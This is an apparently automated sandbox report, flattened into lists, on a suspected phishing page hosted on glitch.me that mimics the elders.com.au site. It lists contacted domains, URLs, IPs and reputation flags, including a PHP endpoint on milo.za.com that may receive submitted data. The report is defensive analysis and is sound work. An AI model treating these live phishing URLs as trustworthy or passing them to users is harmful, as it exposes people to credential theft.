                                      truefalse
                                        high
                                        www.facebook.com
                                        unknown
                                        unknownfalse
                                          high
                                          cdn.mouseflow.com
                                          unknown
                                          unknownfalse
                                            high
                                            cdn.jsdelivr.net
                                            unknown
                                            unknownfalse
                                              high
                                              kit.fontawesome.com
                                              unknown
                                              unknownfalse
                                                high
                                                assets.adobedtm.com
                                                unknown
                                                unknownfalse
                                                  high
                                                  www.clarity.ms
                                                  unknown
                                                  unknownfalse
                                                    high
                                                    connect.facebook.net
                                                    unknown
                                                    unknownfalse
                                                      high
                                                      cm.everesttech.net
                                                      unknown
                                                      unknownfalse
                                                        high
                                                        f.clarity.ms
                                                        unknown
                                                        unknownfalse
                                                          high
                                                          eldersrural.demdex.net
                                                          unknown
                                                          unknownfalse
                                                            unknown
                                                            logo.clearbit.com
                                                            unknown
                                                            unknownfalse
                                                              high
                                                              dpm.demdex.net
                                                              unknown
                                                              unknownfalse
                                                                high
                                                                NameMaliciousAntivirus DetectionReputation
                                                                https://connect.facebook.net/signals/config/253007270729203?v=2.9.176&r=stable&domain=elders.com.au&hme=872f04a0547459b3285cb03b0d7a47bfde40628f4b386809918a621e2688602f&ex_m=70%2C121%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C172%2C175%2C187%2C183%2C184%2C186%2C29%2C101%2C53%2C77%2C185%2C167%2C170%2C180%2C181%2C188%2C131%2C41%2C189%2C190%2C34%2C143%2C15%2C50%2C195%2C194%2C133%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C168%2C171%2C140%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113%2C201%2C200%2C202%2C207%2C208%2C209%2C205%2C197%2C132%2C134%2C163%2C196%2C198%2C122%2C157%2C145%2C151%2C129%2C233%2C116%2C126%2C127%2C234%2C165%2C119%2C236%2C166%2C136%2C123%2C154%2C148%2C193%2C114%2C128false
                                                                  high
                                                                  https://www.facebook.com/privacy_sandbox/pixel/register/trigger/?id=253007270729203&ev=PageView&dl=https%3A%2F%2Felders.com.au%2F&rl=https%3A%2F%2Fastonishing-maize-sunstone.glitch.me%2F&if=false&ts=1730870999319&sw=1280&sh=1024&v=2.9.176&r=stable&ec=0&o=4126&fbp=fb.2.1730870995963.946583266334009605&ler=other&cdl=API_unavailable&it=1730870992696&coo=false&rqm=FGETfalse
                                                                    high
                                                                    https://elders.com.au/content/dam/eld/icons---logos/icons/el-logo-2.svgfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-react.lc-2d7df618eb528a2ce626641aaccea776-lc.min.jsfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://elders.com.au/content/dam/eld/images/livestocknow/close_up_ram_head_horns.pngfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://elders.com.au/content/dam/eld/icons---logos/icons/weather-icons/partly_cloudy.svgfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://yourir.info/lib/1.15.18/yourir.cssfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://elders.com.au/etc.clientlibs/aap2/aap2-core/clientlibs/v2/ax-fx-clientlibs-body.lc-d41d8cd98f00b204e9800998ecf8427e-lc.min.cssfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://www.facebook.com/tr/?id=1013340413305983&ev=PageView&dl=https%3A%2F%2Felders.com.au%2F&rl=https%3A%2F%2Fastonishing-maize-sunstone.glitch.me%2F&if=false&ts=1730870995967&sw=1280&sh=1024&v=2.9.176&r=stable&ec=0&o=4126&fbp=fb.2.1730870995963.946583266334009605&cs_est=true&ler=other&cdl=API_unavailable&it=1730870992696&coo=false&rqm=GETfalse
                                                                      high
                                                                      https://apimprd.ext.elders.com.au/api/v1/WeatherDetail?postCode=5000false
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://connect.facebook.net/signals/config/842278510644971?v=2.9.176&r=stable&domain=elders.com.au&hme=872f04a0547459b3285cb03b0d7a47bfde40628f4b386809918a621e2688602f&ex_m=70%2C121%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C172%2C175%2C187%2C183%2C184%2C186%2C29%2C101%2C53%2C77%2C185%2C167%2C170%2C180%2C181%2C188%2C131%2C41%2C189%2C190%2C34%2C143%2C15%2C50%2C195%2C194%2C133%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C168%2C171%2C140%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113%2C201%2C200%2C202%2C207%2C208%2C209%2C205%2C197%2C132%2C134%2C163%2C196%2C198%2C122%2C157%2C145%2C151%2C129%2C233%2C116%2C126%2C127%2C234%2C165%2C119%2C236%2C166%2C136%2C123%2C154%2C148%2C193%2C114%2C128false
                                                                        high
                                                                        https://elders.com.au/etc.clientlibs/clientlibs/granite/utils.lc-899004cc02c33efc1f6694b1aee587fd-lc.min.jsfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://unpkg.com/react-dom@18/umd/react-dom.development.jsfalse
                                                                          high
                                                                          https://unpkg.com/react-dom@18.3.1/umd/react-dom.development.jsfalse
                                                                            high
                                                                            https://dpm.demdex.net/id?d_visid_ver=5.5.0&d_fieldgroup=MC&d_rtbd=json&d_ver=2&d_orgid=812E14B761A133470A495CCA%40AdobeOrg&d_nsid=0&ts=1730870990712false
                                                                              high
                                                                              https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-dependencies.lc-d41d8cd98f00b204e9800998ecf8427e-lc.min.jsfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://elders.com.au/content/dam/eld/icons---logos/logos/Red_logo.pngfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.cssfalse
                                                                                high
                                                                                https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-base.lc-e592021eafd59de123415ab937a09f08-lc.min.jsfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://upload.wikimedia.org/wikipedia/commons/thumb/4/42/Adobe_Acrobat_DC_logo_2020.svg/384px-Adobe_Acrobat_DC_logo_2020.svg.pngfalse
                                                                                  high
                                                                                  https://unpkg.com/react@18/umd/react.development.jsfalse
                                                                                    high
                                                                                    https://eldersrural.sc.omtrdc.net/b/ss/elders-prod-global/1/JS-2.27.0-LEWM/s5288101782031?AQB=1&ndh=1&pf=1&t=6%2F10%2F2024%200%3A29%3A53%203%20300&mid=01878392218234141113567963242819045089&aamlh=6&ce=UTF-8&cdp=3&fpCookieDomainPeriods=3&pageName=elders%3Ahomepage&g=https%3A%2F%2Felders.com.au%2F&r=https%3A%2F%2Fastonishing-maize-sunstone.glitch.me%2F&c.&p_fo=3.0&getPageLoadTime=2.0.2&performanceWriteFull=1.0&performanceWritePart=1.0&performanceCheck=1.0&cm.&ssf=1&.cm&.c&cc=AUD&server=https%3A%2F%2Felders.com.au%2F&events=event1&aamb=6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y&c1=D%3Dv1&v1=elders&c2=D%3Dv2&v2=https%3A%2F%2Felders.com.au%2F&c3=D%3Dv4&v3=AEM&c4=D%3Dv5&v4=elders%3Ahomepage&c5=D%3Dv6&v5=https%3A%2F%2Felders.com.au%2F&c6=D%3Dv7&v6=Home&c7=D%3Dv8&c8=D%3Dv9&v8=https%3A%2F%2Fastonishing-maize-sunstone.glitch.me%2F&c9=D%3Dv10&c10=D%3Dv11&c11=D%3Dv12&c13=D%3Dv14&v13=elders%20-%20home%20page&c14=D%3Dv15&c15=D%3Dv19&c16=D%3Dv17&c17=D%3Dv20&c18=D%3Dv21&v18=01878392218234141113567963242819045089&c24=D%3Dv26&v24=NaN&c25=D%3Dv27&c26=D%3Dv28&v200=production%3A2024-08-29T04%3A29%3A57Z&s=1280x1024&c=24&j=1.6&v=N&k=Y&bw=1280&bh=907&mcorgid=812E14B761A133470A495CCA%40AdobeOrg&AQE=1false
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://milo.za.com//pood/phpp4all.phpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://dpm.demdex.net/ibs:dpid=411&dpuuid=Zyr_0wAAAJ46RQN-false
                                                                                      high
                                                                                      https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-site.lc-46a2df1a9bfaeeffbd5b53738ed986e6-lc.min.jsfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-react/resources/static/media/Meta-Pro-Medium.afe5599c.ttffalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://www.facebook.com/privacy_sandbox/pixel/register/trigger/?id=842278510644971&ev=PageView&dl=https%3A%2F%2Felders.com.au%2F&rl=https%3A%2F%2Fastonishing-maize-sunstone.glitch.me%2F&if=false&ts=1730870998002&sw=1280&sh=1024&v=2.9.176&r=stable&ec=0&o=4126&fbp=fb.2.1730870995963.946583266334009605&ler=other&cdl=API_unavailable&it=1730870992696&coo=false&rqm=FGETfalse
                                                                                        high
                                                                                        https://elders.com.au/content/dam/eld/icons---logos/icons/branch-services/corporate-office-icon.pngfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://elders.com.au/content/dam/eld/images/homepage-banners/modern_home.jpgfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://elders.com.au/content/dam/eld/images/homepage-banners/staff_background_wheat.jpgfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://elders.com.au/etc.clientlibs/foundation/clientlibs/jquery.lc-dd9b395c741ce2784096e26619e14910-lc.min.jsfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-site/resources/images/svg/icon-cart.svgfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://elders.com.au/content/dam/eld/images/staff-in-action/staff-outdoors/elders_staff_infront_of_shed_and_machinery.jpgfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-dependencies.lc-d41d8cd98f00b204e9800998ecf8427e-lc.min.cssfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                                                        https://url.spec.whatwg.org/#url-parsingchromecache_146.1.dr, chromecache_129.1.drfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://developers.google.com/recaptcha/docs/faq#localhost_supportchromecache_165.1.dr, chromecache_184.1.drfalse
                                                                                          high
                                                                                          https://html.spec.whatwg.org/multipage/syntax.html#generate-implied-end-tagschromecache_146.1.dr, chromecache_129.1.drfalse
                                                                                            high
                                                                                            https://github.com/facebook/react/pull/22064.chromecache_181.1.dr, chromecache_146.1.dr, chromecache_128.1.dr, chromecache_129.1.drfalse
                                                                                              high
                                                                                              https://reactjs.org/link/dangerously-set-inner-htmlchromecache_146.1.dr, chromecache_129.1.drfalse
                                                                                                high
                                                                                                https://reactjs.org/link/warning-keyschromecache_181.1.dr, chromecache_146.1.dr, chromecache_128.1.dr, chromecache_129.1.drfalse
                                                                                                  high
                                                                                                  https://github.com/facebook/react/issues/13610chromecache_181.1.dr, chromecache_146.1.dr, chromecache_128.1.dr, chromecache_129.1.drfalse
                                                                                                    high
                                                                                                    https://github.com/select2/select2/blob/master/LICENSE.mdchromecache_186.1.dr, chromecache_119.1.drfalse
                                                                                                      high
                                                                                                      https://github.com/facebook/react/issues/22459chromecache_146.1.dr, chromecache_129.1.drfalse
                                                                                                        high
                                                                                                        https://v8.dev/blog/elements-kinds#avoid-creating-holeschromecache_146.1.dr, chromecache_129.1.drfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://kit.fontawesome.com/f6136e9b49.jschromecache_126.1.drfalse
                                                                                                          high
                                                                                                          https://html.spec.whatwg.org/multipage/syntax.html#specialchromecache_146.1.dr, chromecache_129.1.drfalse
                                                                                                            high
                                                                                                            https://github.com/twbs/bootstrap/graphs/contributors)chromecache_118.1.dr, chromecache_170.1.drfalse
                                                                                                              high
                                                                                                              https://support.google.com/recaptcha/#6175971chromecache_165.1.dr, chromecache_184.1.drfalse
                                                                                                                high
                                                                                                                http://ns.attribution.com/ads/1.0/chromecache_194.1.drfalse
                                                                                                                  high
                                                                                                                  https://github.com/facebook/react/issues/13188chromecache_146.1.dr, chromecache_129.1.drfalse
                                                                                                                    high
                                                                                                                    https://www.eldersrealestate.com.au/&#34;chromecache_161.1.drfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://github.com/microsoft/claritychromecache_164.1.dr, chromecache_139.1.drfalse
                                                                                                                      high
                                                                                                                      https://reactjs.org/docs/react-api.html#reactchildrencountchromecache_181.1.dr, chromecache_128.1.drfalse
                                                                                                                        high
                                                                                                                        https://support.google.com/recaptchachromecache_184.1.drfalse
                                                                                                                          high
                                                                                                                          https://yourir.info/api/v5chromecache_198.1.drfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          unknown
                                                                                                                          https://upload.wikimedia.org/wikipedia/commons/thumb/4/42/Adobe_Acrobat_DC_logo_2020.svg/384px-Adobechromecache_126.1.drfalse
                                                                                                                            high
                                                                                                                            https://developer.mozilla.org/en-US/docs/Web/API/AnimationEventchromecache_146.1.dr, chromecache_129.1.drfalse
                                                                                                                              high
                                                                                                                              https://developer.mozilla.org/en-US/docs/Web/API/EventTarget/addEventListener#Safely_detecting_optiochromecache_146.1.dr, chromecache_129.1.drfalse
                                                                                                                                high
                                                                                                                                https://reactjs.org/link/react-devtoolschromecache_129.1.drfalse
                                                                                                                                  high
                                                                                                                                  https://www.gstatic.c..?/recaptcha/releases/-ZG7BC9TxCVEbzIO2m429usb/recaptcha__.chromecache_165.1.dr, chromecache_184.1.drfalse
                                                                                                                                    high
                                                                                                                                    https://github.com/facebook/react/issues/12502chromecache_146.1.dr, chromecache_129.1.drfalse
                                                                                                                                      high
                                                                                                                                      https://github.com/facebook/react/issues/708.chromecache_146.1.dr, chromecache_129.1.drfalse
                                                                                                                                        high
                                                                                                                                        https://github.com/facebook/react/issues/12506chromecache_146.1.dr, chromecache_129.1.drfalse
                                                                                                                                          high
                                                                                                                                          https://assets.adobedtm.com/728d44811931/14db0b582053/launch-f5e74cc94fc9.jschromecache_197.1.dr, chromecache_114.1.drfalse
                                                                                                                                            high
                                                                                                                                            https://yourir.info/lib/chromecache_198.1.drfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            https://github.com/facebook/react/issues/14365chromecache_146.1.dr, chromecache_129.1.drfalse
                                                                                                                                              high
                                                                                                                                              https://yourir.info/chromecache_198.1.drfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              unknown
                                                                                                                                              https://github.com/gnarf37/jquery-requestAnimationFramechromecache_205.1.dr, chromecache_113.1.drfalse
                                                                                                                                                high
                                                                                                                                                https://developers.google.com/recaptcha/docs/faq#my-computer-or-network-may-be-sending-automated-quechromecache_165.1.dr, chromecache_184.1.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://reactjs.org/link/error-boundarieschromecache_146.1.dr, chromecache_129.1.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://connect.facebook.net/chromecache_208.1.dr, chromecache_157.1.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://reactjs.org/docs/react-api.html#reactchildrentoarraychromecache_181.1.dr, chromecache_128.1.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://reactjs.org/link/setstate-in-renderchromecache_146.1.dr, chromecache_129.1.drfalse
                                                                                                                                                          high
                                                                                                                                                          https://html.spec.whatwg.org/multipage/syntax.html#parsing-main-inheadchromecache_146.1.dr, chromecache_129.1.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://github.com/facebook/react/issues/3236).chromecache_181.1.dr, chromecache_128.1.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://www.eldersrealestate.com.au/chromecache_161.1.drfalse
                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://creativecommons.org/licenses/by-nd/3.0/legalcode)chromecache_198.1.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://infra.spec.whatwg.org/#ascii-tab-or-newlinechromecache_146.1.dr, chromecache_129.1.drfalse
                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                unknown
                                                                                                                                                                https://github.com/facebook/react/issues/12995chromecache_146.1.dr, chromecache_129.1.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://github.com/facebook/react/issues/21712).chromecache_146.1.dr, chromecache_129.1.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://html.spec.whatwg.org/multipage/semantics.html#the-html-elementchromecache_146.1.dr, chromecache_129.1.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://github.com/facebook/react/issues/11918chromecache_146.1.dr, chromecache_129.1.drfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://reactjs.org/link/hooks-data-fetchingchromecache_146.1.dr, chromecache_129.1.drfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://www.thespanner.co.uk/2007/11/26/ultimate-xss-css-injection/chromecache_146.1.dr, chromecache_129.1.drfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://reactjs.org/link/rules-of-hookschromecache_129.1.drfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://github.com/facebook/react/issues/20756chromecache_181.1.dr, chromecache_128.1.drfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://assets.adobedtm.com/728d44811931/14db0b582053/cbed442a9121/RCbad2c954d87f48819c96e16d0db6567chromecache_175.1.drfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://html.spec.whatwg.org/multipage/syntax.html#parsing-main-intrchromecache_146.1.dr, chromecache_129.1.drfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://www.clarity.ms/tag/chromecache_161.1.drfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://twitter.com/elderslimitedchromecache_161.1.drfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        http://www.linkedin.com/company/elderslimited/chromecache_161.1.drfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://cloud.google.com/contactchromecache_165.1.dr, chromecache_184.1.drfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://reactjs.org/link/react-polyfillschromecache_146.1.dr, chromecache_129.1.drfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://html.spec.whatwg.org/multipage/syntax.html#parsing-main-inselectchromecache_146.1.dr, chromecache_129.1.drfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://github.com/facebook/react/issues/11807chromecache_146.1.dr, chromecache_129.1.drfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://github.com/mozilla/gecko-dev/blob/4e638efc71/layout/style/test/property_database.jschromecache_146.1.dr, chromecache_129.1.drfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://html.spec.whatwg.org/multipage/syntax.html#parsing-main-inbodychromecache_146.1.dr, chromecache_129.1.drfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://assets.adobedtm.com/extensions/EP8757b503532a44a68eee17773f6f10a0/AppMeasurement_Module_Actichromecache_215.1.dr, chromecache_213.1.drfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://reactjs.org/docs/react-api.html#createelementchromecache_181.1.dr, chromecache_128.1.drfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://html.spec.whatwg.org/multipage/syntax.html#parsing-main-incaptionchromecache_146.1.dr, chromecache_129.1.drfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                                                                            • 75% < No. of IPs
                                                                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                            13.107.246.64
                                                                                                                                                                                                            s-part-0036.t-0009.t-msedge.netUnited States
                                                                                                                                                                                                            8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                            13.107.246.45
                                                                                                                                                                                                            s-part-0017.t-0009.t-msedge.netUnited States
                                                                                                                                                                                                            8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                            45.76.112.20
                                                                                                                                                                                                            yourir.infoUnited States
                                                                                                                                                                                                            20473AS-CHOOPAUSfalse
                                                                                                                                                                                                            151.101.129.229
                                                                                                                                                                                                            jsdelivr.map.fastly.netUnited States
                                                                                                                                                                                                            54113FASTLYUSfalse
                                                                                                                                                                                                            157.240.0.6
                                                                                                                                                                                                            scontent.xx.fbcdn.netUnited States
                                                                                                                                                                                                            32934FACEBOOKUSfalse
                                                                                                                                                                                                            104.17.245.203
                                                                                                                                                                                                            unpkg.comUnited States
                                                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                            185.15.59.240
                                                                                                                                                                                                            upload.wikimedia.orgNetherlands
                                                                                                                                                                                                            14907WIKIMEDIAUSfalse
                                                                                                                                                                                                            142.250.186.132
                                                                                                                                                                                                            www.google.comUnited States
                                                                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                                                                            172.66.0.34
                                                                                                                                                                                                            apimprd.ext.elders.com.auUnited States
                                                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                            13.32.27.129
                                                                                                                                                                                                            d26p066pn2w0s0.cloudfront.netUnited States
                                                                                                                                                                                                            7018ATT-INTERNET4USfalse
                                                                                                                                                                                                            52.211.141.218
                                                                                                                                                                                                            dcs-public-edge-irl1-150041215.eu-west-1.elb.amazonaws.comUnited States
                                                                                                                                                                                                            16509AMAZON-02USfalse
                                                                                                                                                                                                            52.16.55.91
                                                                                                                                                                                                            unknownUnited States
                                                                                                                                                                                                            16509AMAZON-02USfalse
                                                                                                                                                                                                            157.240.0.35
                                                                                                                                                                                                            unknownUnited States
                                                                                                                                                                                                            32934FACEBOOKUSfalse
                                                                                                                                                                                                            63.140.62.17
                                                                                                                                                                                                            eldersrural.sc.omtrdc.netUnited States
                                                                                                                                                                                                            15224OMNITUREUSfalse
                                                                                                                                                                                                            162.159.140.34
                                                                                                                                                                                                            elders.com.auUnited States
                                                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                            239.255.255.250
                                                                                                                                                                                                            unknownReserved
                                                                                                                                                                                                            unknownunknownfalse
                                                                                                                                                                                                            188.114.96.3
                                                                                                                                                                                                            milo.za.comEuropean Union
                                                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                            172.217.16.196
                                                                                                                                                                                                            unknownUnited States
                                                                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                                                                            54.91.146.110
                                                                                                                                                                                                            astonishing-maize-sunstone.glitch.meUnited States
                                                                                                                                                                                                            14618AMAZON-AESUSfalse
                                                                                                                                                                                                            157.240.251.35
                                                                                                                                                                                                            star-mini.c10r.facebook.comUnited States
                                                                                                                                                                                                            32934FACEBOOKUSfalse
                                                                                                                                                                                                            104.17.25.14
                                                                                                                                                                                                            cdnjs.cloudflare.comUnited States
                                                                                                                                                                                                            13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                            172.217.18.100
                                                                                                                                                                                                            unknownUnited States
                                                                                                                                                                                                            15169GOOGLEUSfalse
                                                                                                                                                                                                            IP
                                                                                                                                                                                                            192.168.2.4
                                                                                                                                                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                            Analysis ID:1549841
                                                                                                                                                                                                            Start date and time:2024-11-06 06:27:49 +01:00
                                                                                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                                                                                            Overall analysis duration:0h 3m 27s
                                                                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                                                                            Report type:full
                                                                                                                                                                                                            Cookbook file name:browseurl.jbs
                                                                                                                                                                                                            Sample URL:https://astonishing-maize-sunstone.glitch.me/
                                                                                                                                                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                            Number of analysed new started processes analysed:7
                                                                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                                                                                            Technologies:
                                                                                                                                                                                                            • EGA enabled
                                                                                                                                                                                                            • AMSI enabled
                                                                                                                                                                                                            Analysis Mode:default
                                                                                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                                                                                            Detection:MAL
                                                                                                                                                                                                            Classification:mal60.phis.win@19/173@84/23
                                                                                                                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 142.250.184.195, 142.250.185.78, 66.102.1.84, 34.104.35.123, 172.64.147.188, 104.18.40.68, 142.250.185.138, 142.250.74.202, 142.250.186.138, 142.250.181.234, 172.217.23.106, 172.217.16.138, 142.250.184.202, 142.250.185.74, 142.250.185.202, 142.250.186.106, 142.250.186.74, 142.250.185.234, 142.250.186.42, 142.250.186.170, 172.217.18.10, 142.250.185.170, 4.175.87.197, 93.184.221.240, 192.229.221.95, 20.3.187.198, 13.95.31.18, 104.18.186.31, 104.18.187.31, 184.28.89.29, 142.250.186.163, 142.250.181.232, 104.18.27.50, 104.18.26.50, 172.217.23.104, 52.30.115.192, 52.16.193.179, 52.210.64.198, 142.250.185.99, 51.8.44.252, 142.250.185.106, 216.58.212.138, 216.58.206.42, 142.250.184.234, 172.217.16.202, 172.217.18.106, 216.58.212.170, 216.58.206.74, 216.58.206.67, 172.217.18.3, 142.250.185.131, 142.250.185.227
                                                                                                                                                                                                            • Excluded domains from analysis (whitelisted): cdn.jsdelivr.net.cdn.cloudflare.net, slscr.update.microsoft.com, otelrules.afd.azureedge.net, vmss-clarity-ingest-eus-b.eastus.cloudapp.azure.com, cn-assets.adobedtm.com.edgekey.net, clientservices.googleapis.com, wu.azureedge.net, cdn.mouseflow.com.cdn.cloudflare.net, maps.googleapis.com, clients2.google.com, ocsp.digicert.com, www.googletagmanager.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, update.googleapis.com, azurefd-t-prod.trafficmanager.net, www.gstatic.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, kit.fontawesome.com.cdn.cloudflare.net, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.azureedge.net, ajax.googleapis.com, fonts.gstatic.com, wu.ec.azureedge.net, cm.everesttech.net.akadns.net, ctldl.windowsupdat
                                                                                                                                                                                                            • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                                                                            • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                            • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                            No simulations
                                                                                                                                                                                                            No context
                                                                                                                                                                                                            No context
                                                                                                                                                                                                            No context
                                                                                                                                                                                                            No context
                                                                                                                                                                                                            No context
                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            File Type:PNG image data, 30 x 31, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                            Size (bytes):2373
                                                                                                                                                                                                            Entropy (8bit):6.9051491035012305
                                                                                                                                                                                                            Encrypted:false
